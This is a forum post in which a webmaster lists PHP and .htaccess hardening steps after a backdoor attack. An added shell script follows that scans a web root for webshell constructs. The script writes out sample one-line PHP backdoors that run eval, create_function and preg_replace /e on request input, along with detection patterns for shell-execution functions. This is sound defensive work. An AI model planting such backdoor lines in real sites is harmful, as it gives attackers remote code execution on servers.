OK, so my server got hacked last week. The hacker attacked an out-of-date 3rd-party editor (in PHP), implanted a backdoor script in PHP and did serious damage to my sites. I spent a whole weekend cleaning the backdoor scripts and any malicious code he left on my server. In order to avoid being hacked again, I did the following to my server:
- Turn off file_upload in PHP. Since the hacker uploaded the backdoor through PHP, I disabled the function in php.ini. So now I can only upload through FTP.
- Disable create_function in PHP. None of my software uses this function. The hacker used this function the same way as eval() to execute commands passed in as strings.
- Disable popen, exec, system, passthru, proc_open, shell_exec, show_source, phpinfo in php.ini. These functions are primarily used by the backdoor script to modify my files and directories.
- Install Suhosin. Find the legitimate functions that are called within eval() and put them in suhosin.executor.eval.whitelist. The hacker put malicious code in my program, obfuscated it with base64_encode, and then executed it within eval(). So I only allow a couple of legitimate functions to be called within eval().
- Turn on suhosin.executor.disable_emodifier. The hacker put another piece of obfuscated code in my program and used the preg_replace() e modifier to execute whatever PHP commands he put in his browser. So he could upload or modify any files on the server through his browser. (Since I turned off file_upload, he could not upload any more, but he could still modify and delete files as he wanted.)
By disabling create_function and the preg_replace() e modifier and limiting eval(), even if there is malicious code left uncleaned on my server, the hacker could not do anything. These are the 3 most dangerous functions in PHP.
- Add a .htaccess to every folder except the root directory, forbidding PHP from being executed directly from the browser:
<Files "*.php*">
Order Deny,Allow
Deny from all
</Files>
I put another * after php because I found a backdoor file named missing.php.DISABLED, and this can still be executed if I do not put the * after php.
- Set the root directory (the only place that allows .php to be executed) as read-only. Set all files in that folder read-only. So the hacker could not upload any new backdoor script to the only directory where PHP can be executed, nor could he modify the files in that directory.
- For the WordPress login, I added
Order Deny,Allow
Deny from all
allow from xxx.xxx.xxx.xxx
to the .htaccess in the root directory, where xxx.xxx.xxx.xxx is my IP.
- Set all .htaccess files read-only.
Well, this is what I can do to strengthen the security of my server. Did I miss anything?
Thank you for your advice.
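As an added example that is not part of the original post (nor any answer to it), the following POSIX shell script does the kind of sweep the cleanup above describes: it greps a web root for the constructs the poster singles out (eval() over base64_decode, create_function(), the preg_replace() e modifier, and shell-execution functions fed straight from the request), and separately lists files whose name has a second extension after .php, the missing.php.DISABLED case. The sample web root, file names and file contents are constructed for the demonstration, and the regex list is my own assumption: it covers the functions named in the post and is a triage aid, not a complete webshell signature set.

```shell
#!/bin/sh
# Added example (not the original poster's code): scan a web root for the PHP
# constructs the post identifies as the backdoor's tools, plus files with a
# second extension after .php (the missing.php.DISABLED case). The sample tree,
# file names and file contents below are constructed for the demonstration.

# Build a small web root in a temp directory and print its path.
make_sample_tree() {
  root="$(mktemp -d)"
  mkdir -p "$root/wp-content/uploads"
  # Constructed benign file: an ordinary preg_replace with no e modifier.
  cat >"$root/index.php" <<'EOF'
<?php
echo preg_replace('/\s+/', ' ', $title); // whitespace collapse, no e modifier
EOF
  # Constructed backdoor: base64 payload from the request body fed to eval().
  cat >"$root/wp-content/uploads/missing.php.DISABLED" <<'EOF'
<?php eval(base64_decode($_POST['c'])); ?>
EOF
  # Constructed backdoor: create_function() and a preg_replace e modifier,
  # both used to run attacker-supplied code from the request.
  cat >"$root/wp-content/uploads/thumb.php" <<'EOF'
<?php
$f = create_function('', $_GET['x']); $f();
preg_replace('/.*/e', $_REQUEST['cmd'], '');
EOF
  printf '%s\n' "$root"
}

# List files under $1 that contain any of the flagged constructs, one per line.
# The pattern list is an assumption: it covers the functions named in the post,
# so it is a triage aid and not a complete webshell signature set.
scan_php_backdoors() {
  pat="$(mktemp)"
  cat >"$pat" <<'EOF'
eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|gzuncompress|str_rot13)
create_function[[:space:]]*\(
preg_replace[[:space:]]*\([[:space:]]*['"][^'"]*[^[:alnum:]'"\\ ][[:alpha:]]*e[[:alpha:]]*['"]
(system|exec|passthru|shell_exec|popen|proc_open)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)
EOF
  # -r recurse, -l print only file names, -i ignore case, -E extended regex
  grep -rliE -f "$pat" "$1" 2>/dev/null | sort
  rm -f "$pat"
}

# List files under $1 whose name has .php followed by another extension.
# mod_php configured with AddHandler treats .php anywhere in the name as PHP,
# so such files can still be executed; a SetHandler scoped with
# <FilesMatch "\.php$">, or the Files *.php* deny block from the post, closes
# that gap.
find_double_extension_php() {
  find "$1" -type f -name '*.php.*' | sort
}

# Stand-alone run: build the tree, report, and clean up.
root="$(make_sample_tree)"
echo "Suspicious content:"
scan_php_backdoors "$root"
echo "Double-extension PHP files:"
find_double_extension_php "$root"
rm -rf "$root"
```

Run it against a real document root by calling scan_php_backdoors and find_double_extension_php with that path instead of the constructed tree; the e-modifier pattern only fires when the modifier letters at the end of the pattern literal contain an e, so a benign '/foo/i' or '/e/' is not reported.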
Unless you reimaged the machine from known-clean install media, you can’t know there isn’t a lingering rootkit.